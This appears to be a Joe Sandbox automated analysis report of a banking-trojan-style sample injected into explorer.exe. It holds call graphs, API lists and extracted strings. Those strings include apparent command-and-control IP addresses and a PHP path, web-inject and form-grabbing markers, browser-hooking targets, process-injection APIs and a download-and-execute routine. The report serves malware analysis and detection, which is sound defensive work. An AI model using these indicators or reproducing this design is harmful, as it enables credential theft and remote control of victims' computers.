b0bb480 _DllMainCRTStartup 98 API calls 108499->108502 108500->108505 108518 b0bd638 40 API calls 16 library calls 108500->108518 108504 b0bd876 108502->108504 108517 b0bd638 40 API calls 16 library calls 108504->108517 108507->108496 108509 b0bb488 108508->108509 108512 b0bb4a0 _DllMainCRTStartup 108508->108512 108510 b0bb4ac 108509->108510 108519 b0a5340 108509->108519 108510->108499 108554 b0a8bd0 4 API calls 2 library calls 108512->108554 108513 b0bb491 108526 b0bb2c0 108513->108526 108517->108500 108518->108505 108555 b0cf008 108519->108555 108521 b0a5f31 GetProcAddress 108522 b0a5f4d _DllMainCRTStartup 108521->108522 108523 b0a6001 _DllMainCRTStartup 108522->108523 108524 b0a6021 GetProcAddress 108523->108524 108525 b0a6053 _DllMainCRTStartup 108524->108525 108525->108513 108556 b0b4f30 108526->108556 108529 b0bb38b _DllMainCRTStartup 108533 b0bb3ab _DllMainCRTStartup 108529->108533 108534 b0bb39f _DllMainCRTStartup 108529->108534 108530 b0bb36d _DllMainCRTStartup 108530->108529 108576 b0ba010 41 API calls _DllMainCRTStartup 108530->108576 108532 b0bb314 _DllMainCRTStartup 108532->108530 108558 b0a1c60 108532->108558 108538 b0bb3bf _DllMainCRTStartup 108533->108538 108539 b0bb3ce _DllMainCRTStartup 108533->108539 108577 b0b9730 83 API calls 3 library calls 108534->108577 108578 b0b9730 83 API calls 3 library calls 108538->108578 108542 b0bb3e2 _DllMainCRTStartup 108539->108542 108543 b0bb3f1 _DllMainCRTStartup 108539->108543 108579 b0b9730 83 API calls 3 library calls 108542->108579 108545 b0bb414 _DllMainCRTStartup 108543->108545 108546 b0bb405 _DllMainCRTStartup 108543->108546 108548 b0bb439 _DllMainCRTStartup 108545->108548 108549 b0bb428 _DllMainCRTStartup 108545->108549 108580 b0b9730 83 API calls 3 library calls 108546->108580 108551 b0bcbb0 _wsetlocale_nolock 2 API calls 108548->108551 108581 b0b9730 83 API calls 3 library calls 108549->108581 108553 b0bb46c 108551->108553 108552 b0bb437 108552->108548 108553->108499 108554->108510 108555->108521 108557 b0b4f3c GetModuleFileNameA 108556->108557 108557->108532 108582 b0aef20 108558->108582 108562 b0a1c9b _DllMainCRTStartup 108589 b0a8b60 108562->108589 108564 b0a1cb8 108592 b0a8a90 GetProcAddress _DllMainCRTStartup 108564->108592 108566 b0a1cd9 108593 b0a8a90 GetProcAddress _DllMainCRTStartup 108566->108593 108568 b0a1cfa _DllMainCRTStartup 108569 b0bcbb0 _wsetlocale_nolock 2 API calls 108568->108569 108570 b0a1d13 108569->108570 108571 b0b5580 108570->108571 108598 b0b53e0 108571->108598 108577->108533 108578->108539 108579->108543 108580->108545 108581->108552 108594 b0aedf0 108582->108594 108584 b0aef74 _DllMainCRTStartup 108585 b0bcbb0 _wsetlocale_nolock 2 API calls 108584->108585 108586 b0a1c83 108585->108586 108587 b0af170 CreateFileW 108586->108587 108588 b0af1b3 6 library calls 108587->108588 108588->108562 108590 b0a8610 _DllMainCRTStartup Sleep 108589->108590 108591 b0a8b6d _DllMainCRTStartup 108590->108591 108591->108564 108592->108566 108593->108568 108595 b0aee49 _DllMainCRTStartup 108594->108595 108596 b0bcbb0 _wsetlocale_nolock 2 API calls 108595->108596 108597 b0aef0b 108596->108597 108597->108584 108599 b0b5425 _ld12tod 108598->108599 108600 b0b548d GetUserNameW GetComputerNameW 108599->108600 108620 b0af310 108600->108620 108602 b0b54c5 108603 b0af310 _DllMainCRTStartup malloc 108602->108603 108604 b0b54d4 _DllMainCRTStartup 108603->108604 108626 b0a9200 108604->108626 108606 b0b554e _DllMainCRTStartup 108607 b0bcbb0 _wsetlocale_nolock 2 API calls 108606->108607 108608 b0b5566 108607->108608 108609 b0b4f60 108608->108609 108610 b0b4f90 _DllMainCRTStartup 108609->108610 108611 b0a9200 _DllMainCRTStartup 21 API calls 108610->108611 108612 b0b4fd1 _DllMainCRTStartup 108611->108612 108613 b0b5000 StrChrA 108612->108613 108614 b0b4ff0 108612->108614 108615 b0b4ff5 _DllMainCRTStartup 108612->108615 108618 b0b5021 _DllMainCRTStartup 108613->108618 108616 b0b53e0 _DllMainCRTStartup 24 API calls 108614->108616 108617 b0b506b SleepEx 108615->108617 108616->108615 108618->108613 108618->108615 108683 b0b52d0 108618->108683 108621 b0af31e 108620->108621 108622 b0af326 _DllMainCRTStartup 108620->108622 108621->108602 108623 b0af35f 108622->108623 108624 b0af371 malloc 108622->108624 108623->108602 108625 b0af388 _DllMainCRTStartup 108624->108625 108625->108602 108627 b0a933f _mtinitlocknum _DllMainCRTStartup 108626->108627 108628 b0a923d __lock_fhandle _DllMainCRTStartup 108626->108628 108640 b0a7070 108627->108640 108676 b0aecd0 108628->108676 108631 b0a93a1 _DllMainCRTStartup 108632 b0a93da _DllMainCRTStartup 108631->108632 108633 b0a7070 _DllMainCRTStartup 20 API calls 108631->108633 108634 b0bcbb0 _wsetlocale_nolock 2 API calls 108632->108634 108633->108631 108635 b0a9414 108634->108635 108635->108606 108636 b0a929c _DllMainCRTStartup 108637 b0a7070 _DllMainCRTStartup 20 API calls 108636->108637 108638 b0a930c _DllMainCRTStartup 108637->108638 108638->108627 108639 b0a7070 _DllMainCRTStartup 20 API calls 108638->108639 108639->108638 108644 b0a70b3 _ld12tod _DllMainCRTStartup 108640->108644 108641 b0a71cc WSAStartup 108642 b0a71e4 socket 108641->108642 108645 b0a7644 _DllMainCRTStartup 108641->108645 108643 b0a7205 gethostbyname 108642->108643 108642->108645 108643->108645 108649 b0a7218 _DllMainCRTStartup 108643->108649 108644->108641 108646 b0a767b closesocket WSACleanup 108645->108646 108647 b0bcbb0 _wsetlocale_nolock 2 API calls 108646->108647 108648 b0a76c4 108647->108648 108648->108631 108649->108645 108650 b0a726b send 108649->108650 108650->108645 108651 b0a7289 108650->108651 108652 b0a7292 send 108651->108652 108666 b0a72aa _ld12tod _DllMainCRTStartup 108651->108666 108652->108645 108652->108666 108653 b0a72f0 recv 108653->108645 108653->108666 108654 b0a76d5 108682 b0bce28 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 108654->108682 108656 b0a76da 108657 b0a7449 108658 b0a7452 108657->108658 108660 b0a75fc 108657->108660 108661 b0a7464 malloc 108657->108661 108658->108645 108659 b0a745a 108658->108659 108659->108661 108662 b0a764c malloc 108660->108662 108663 b0a7601 malloc 108660->108663 108664 b0a74a0 recv 108661->108664 108662->108646 108665 b0a7620 recv 108663->108665 108664->108645 108674 b0a74c5 _DllMainCRTStartup 108664->108674 108665->108645 108667 b0a763d 108665->108667 108666->108645 108666->108653 108666->108654 108666->108657 108667->108645 108667->108665 108668 b0a76cf 108681 b0bce28 IsProcessorFeaturePresent RtlLookupFunctionEntry __report_securityfailure 108668->108681 108670 b0a76d4 108670->108654 108671 b0a75e0 108671->108645 108671->108646 108672 b0a754a realloc 108672->108674 108673 b0a7570 recv 108673->108645 108673->108674 108674->108645 108674->108664 108674->108668 108674->108671 108674->108672 108674->108673 108675 b0a759a recv 108674->108675 108675->108645 108675->108674 108677 b0aed22 _DllMainCRTStartup 108676->108677 108678 b0aedaa wsprintfA 108677->108678 108679 b0bcbb0 _wsetlocale_nolock 2 API calls 108678->108679 108680 b0aeddb 108679->108680 108680->108636 108681->108670 108682->108656 108685 b0b5391 _ld12tod 108683->108685 108689 b0b52f6 _ld12tod 108683->108689 108684 b0b538f _DllMainCRTStartup 108686 b0bcbb0 _wsetlocale_nolock 2 API calls 108684->108686 108687 b0b5070 _DllMainCRTStartup 22 API calls 108685->108687 108688 b0b53cc 108686->108688 108687->108684 108688->108618 108689->108684 108694 b0b5070 108689->108694 108695 b0b50b7 _ld12tod _DllMainCRTStartup 108694->108695 108696 b0b5118 InternetCrackUrlA 108695->108696 108697 b0b5135 _ld12tod 108696->108697 108703 b0b5262 _DllMainCRTStartup 108696->108703 108700 b0a7070 _DllMainCRTStartup 20 API calls 108697->108700 108697->108703 108698 b0bcbb0 _wsetlocale_nolock 2 API calls 108699 b0b52b6 108698->108699 108699->108684 108704 b0af010 108699->108704 108701 b0b517b _DllMainCRTStartup 108700->108701 108702 b0b5269 ShellExecuteA 108701->108702 108701->108703 108702->108703 108703->108698 108705 b0aecd0 _DllMainCRTStartup 3 API calls 108704->108705 108706 b0af052 _DllMainCRTStartup 108705->108706 108707 b0bcbb0 _wsetlocale_nolock 2 API calls 108706->108707 108708 b0af0db DeleteFileA CopyFileA 108707->108708 108708->108684 108709 b0b73b0 108712 b0b73da _DllMainCRTStartup 108709->108712 108711 b0a2c10 37 API calls _DllMainCRTStartup 108711->108712 108712->108711 108713 b0b7a90 28 API calls 108712->108713 108717 b0b7418 _DllMainCRTStartup 108712->108717 108719 b0b790b Sleep 108712->108719 108720 b0b7960 OpenClipboard 108712->108720 108713->108712 108714 b0b7b00 28 API calls 108714->108717 108715 b0a2c10 37 API calls _DllMainCRTStartup 108715->108717 108716 b0a1100 28 API calls _DllMainCRTStartup 108716->108717 108717->108712 108717->108714 108717->108715 108717->108716 108718 b0b7b50 7 API calls 108717->108718 108717->108719 108718->108717 108719->108712 108721 b0b797b GetClipboardData 108720->108721 108722 b0b79d4 108720->108722 108723 b0b79ab CloseClipboard 108721->108723 108724 b0b7991 GlobalLock 108721->108724 108732 b0a2c10 108722->108732 108723->108722 108728 b0b79bb 108723->108728 108724->108723 108727 b0b799f GlobalUnlock 108724->108727 108727->108723 108731 b0a1100 28 API calls _DllMainCRTStartup 108728->108731 108730 b0b79c6 108730->108712 108731->108730 108733 b0a2c2d Concurrency::details::_TaskCreationCallstack::_TaskCreationCallstack _DllMainCRTStartup 108732->108733 108736 b0a2070 108733->108736 108735 b0a2c64 108735->108712 108737 b0a2099 _DllMainCRTStartup 108736->108737 108738 b0a2136 108737->108738 108740 b0a20a2 _DllMainCRTStartup 108737->108740 108753 b0a2030 28 API calls _DllMainCRTStartup 108738->108753 108742 b0a20dc 108740->108742 108743 b0a20c4 108740->108743 108752 b0a1e80 28 API calls _DllMainCRTStartup 108742->108752 108750 b0a23e0 37 API calls 2 library calls 108743->108750 108746 b0a20cd 108751 b0a2360 37 API calls 2 library calls 108746->108751 108748 b0a20da 108749 b0a20e7 char_traits _DllMainCRTStartup 108748->108749 108749->108735 108750->108746 108751->108748 108752->108749

                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                        Function 0B0A5340 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                        • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$.exe$/VzCAHn.php$185.81.68.147$185.81.68.148$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%s|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%d|$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                        • API String ID: 2683923594-1492645186
                                                                                                                                                                                                                        • Opcode ID: 2cf7b99535ff4509c01cef5f458d73deaeda5a23fe5aa195646fd786619906e5
                                                                                                                                                                                                                        • Instruction ID: 5704b6119795266cf3bd693a9bb4102785335fdf4a2c5d1564ef73f02e1d7334
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cf7b99535ff4509c01cef5f458d73deaeda5a23fe5aa195646fd786619906e5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93033A78602F0195EB459B91FC9535B33AAFB49BA4F548A26C8AD23374FF78C198C350
                                                                                                                                                                                                                        Function 0B0A17F0 Relevance: 80.8, APIs: 34, Strings: 12, Instructions: 262stringfilethreadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                        • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                        • API String ID: 3240663557-511764017
                                                                                                                                                                                                                        • Opcode ID: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction ID: 68f544f94f4a334a46beb90536e4b428348edf4170dfce76954ed830dd57ea22
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352273a83656680a223d5b2e7905f20ea1ceae74909057777973b3f09b6bce98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BC15E72204B428AEB54DF66E85479E7BA2F789B88F400625DE4E47B28DF38C14DCB01
                                                                                                                                                                                                                        Function 0B0A7070 Relevance: 60.4, APIs: 40, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 428 b0a7070-b0a7134 call b0b4f30 call b0e0bd0 call b0e0bd8 * 5 443 b0a7190-b0a71de call b0e0bd8 WSAStartup 428->443 444 b0a7136-b0a713a 428->444 449 b0a71e4-b0a71ff socket 443->449 450 b0a7665 443->450 444->443 446 b0a713c-b0a718a call b0e0bd8 call b0e0b48 call b0e0bd8 * 2 444->446 446->443 452 b0a766c 449->452 453 b0a7205-b0a7212 gethostbyname 449->453 450->452 456 b0a766f-b0a7675 call b0e0b60 452->456 453->452 455 b0a7218-b0a7258 call b0e0c10 call b0e0c60 call b0e0c68 453->455 455->452 471 b0a725e-b0a7283 call b0e0bb8 send 455->471 463 b0a767b-b0a76ce closesocket WSACleanup call b0bcbb0 456->463 471->452 474 b0a7289-b0a7290 471->474 475 b0a72aa-b0a72e1 call b0b4f30 474->475 476 b0a7292-b0a72a4 send 474->476 479 b0a72f0-b0a730b recv 475->479 476->452 476->475 479->452 480 b0a7311-b0a7314 479->480 481 b0a742a-b0a7439 480->481 482 b0a731a-b0a7323 480->482 481->452 483 b0a743f-b0a7444 481->483 482->481 484 b0a7329-b0a7332 482->484 483->479 484->481 485 b0a7338-b0a733f 484->485 486 b0a76d5-b0a76da call b0bce28 485->486 487 b0a7345-b0a7353 485->487 489 b0a737a-b0a738f call b0e0bb8 487->489 490 b0a7355-b0a736b call b0e0c18 487->490 496 b0a7449-b0a7450 489->496 497 b0a7395-b0a73ab call b0e0c28 489->497 490->452 498 b0a7371-b0a7375 490->498 501 b0a745c-b0a745e 496->501 502 b0a7452-b0a7454 496->502 509 b0a73ad-b0a73c6 call b0e0c18 497->509 510 b0a7424 497->510 499 b0a7426 498->499 499->481 505 b0a75fc-b0a75ff 501->505 506 b0a7464-b0a7498 malloc 501->506 502->452 504 b0a745a 502->504 504->506 507 b0a764c-b0a7663 malloc 505->507 508 b0a7601-b0a761c malloc 505->508 511 b0a74a0-b0a74bf recv 506->511 507->463 512 b0a7620-b0a763b recv 508->512 520 b0a73c8-b0a73e6 call b0e0c38 509->520 521 b0a73ee-b0a7400 call b0e0c18 509->521 510->499 511->456 514 b0a74c5-b0a74c7 511->514 512->452 515 b0a763d-b0a7642 512->515 517 b0a75ce-b0a75d0 514->517 518 b0a74cd-b0a74d5 514->518 515->512 519 b0a7644-b0a764a 515->519 523 b0a75d3-b0a75da 517->523 518->517 522 b0a74db-b0a74e3 518->522 519->463 520->452 534 b0a73ec 520->534 521->510 532 b0a7402-b0a7420 call b0e0c18 521->532 522->517 524 b0a74e9-b0a74f0 522->524 523->511 526 b0a75e0 523->526 528 b0a76cf-b0a76d4 call b0bce28 524->528 529 b0a74f6-b0a7528 call b0e0c38 524->529 526->456 528->486 529->456 540 b0a752e-b0a7530 529->540 532->510 534->510 540->456 541 b0a7536 540->541 542 b0a753c-b0a7548 541->542 543 b0a75e5-b0a75f7 541->543 544 b0a754a-b0a755e realloc 542->544 545 b0a7562-b0a7568 542->545 543->463 544->545 546 b0a7570-b0a758e recv 545->546 546->456 547 b0a7594-b0a7598 546->547 547->546 548 b0a759a-b0a75b3 recv 547->548 548->456 549 b0a75b9-b0a75cc 548->549 549->523
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$CleanupStartupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4277384649-0
                                                                                                                                                                                                                        • Opcode ID: d835f0f9f0d530a6b33a8ee7740b463374d98f2066bcac00140a0b50f44e64af
                                                                                                                                                                                                                        • Instruction ID: 0d3eb394e8cb019d23478eacbc872b025c0d9a347d897e2a39fd2b19aa96378c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d835f0f9f0d530a6b33a8ee7740b463374d98f2066bcac00140a0b50f44e64af
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7F1D672300A818ADB78DF69E8447EF77A1F748B89F449926CA5E47B54EF78C584C700
                                                                                                                                                                                                                        Function 0B0B5070 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0B0B5112
                                                                                                                                                                                                                        • InternetCrackUrlA.WININET ref: 0B0B5127
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcpyA.KERNEL32 ref: 0B0A70CE
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A70DF
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A70F3
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7107
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7118
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A712C
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A714A
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: wsprintfA.USER32 ref: 0B0A7162
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A7176
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A718A
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrcatA.KERNEL32 ref: 0B0A71C6
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: WSAStartup.WS2_32 ref: 0B0A71D6
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: socket.WS2_32 ref: 0B0A71F2
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: gethostbyname.WS2_32 ref: 0B0A7209
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: memcpy.MSVCRT ref: 0B0A7229
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: htons.WS2_32 ref: 0B0A7238
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: connect.WS2_32 ref: 0B0A724F
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: lstrlenA.KERNEL32 ref: 0B0A7265
                                                                                                                                                                                                                          • Part of subcall function 0B0A7070: send.WS2_32 ref: 0B0A727B
                                                                                                                                                                                                                        • PathFindFileNameA.SHLWAPI ref: 0B0B51A1
                                                                                                                                                                                                                        • GetTempPathA.KERNEL32 ref: 0B0B51BF
                                                                                                                                                                                                                        • GetTempFileNameA.KERNEL32 ref: 0B0B51D5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0B51E5
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0B0B51F1
                                                                                                                                                                                                                        • CreateFileA.KERNEL32 ref: 0B0B521A
                                                                                                                                                                                                                        • WriteFile.KERNEL32 ref: 0B0B523F
                                                                                                                                                                                                                        • free.MSVCRT ref: 0B0B524E
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0B0B5257
                                                                                                                                                                                                                        • ShellExecuteA.SHELL32 ref: 0B0B5285
                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 0B0B5294
                                                                                                                                                                                                                        • free.MSVCRT ref: 0B0B529F
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0E9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2799764483.000000000B0EB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_b0a0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3619236930-0
                                                                                                                                                                                                                        • Opcode ID: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction ID: d20e12eeada580e339d90aa189e97cb9b1967750c712868921e5028871a4cabc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ecfd1c38ba8e442a98d9586bc9e0933db9910eba4d4230b8b6c88557bb2a767
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED518D32714A418AFB24CFA6EC647EE77A1F789B88F444425DE5A47B68EF78C145CB00
                                                                                                                                                                                                                        Function 0B0B53E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32 ref: 0B0B5499
                                                                                                                                                                                                                        • GetComputerNameW.KERNEL32 ref: 0B0B54B3
                                                                                                                                                                                                                          • Part of subcall function 0B0AF310: WideCharToMultiByte.KERNEL32 ref: 0B0AF353
                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0B0B54DC
                                                                                                                                                                                                                        • GetVersionExA.KERNEL32 ref: 0B0B54ED
                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 0B0B553D
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: EnterCriticalSection.KERNEL32 ref: 0B0A9248
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: RtlInitializeCriticalSection.NTDLL ref: 0B0A9255
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcpyA.KERNEL32 ref: 0B0A928A
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcpyA.KERNEL32 ref: 0B0A92AD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcatA.KERNEL32 ref: 0B0A92BD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrcatA.KERNEL32 ref: 0B0A92CD
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: LeaveCriticalSection.KERNEL32 ref: 0B0A9354
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: memcpy.MSVCRT ref: 0B0A936C
                                                                                                                                                                                                                          • Part of subcall function 0B0A9200: lstrlenA.KERNEL32 ref: 0B0A937A
                                                                                                                                                                                                                        • free.MSVCRT ref: 0B0B5551
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2799764483.000000000B0A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B0A0000, based on PE: true
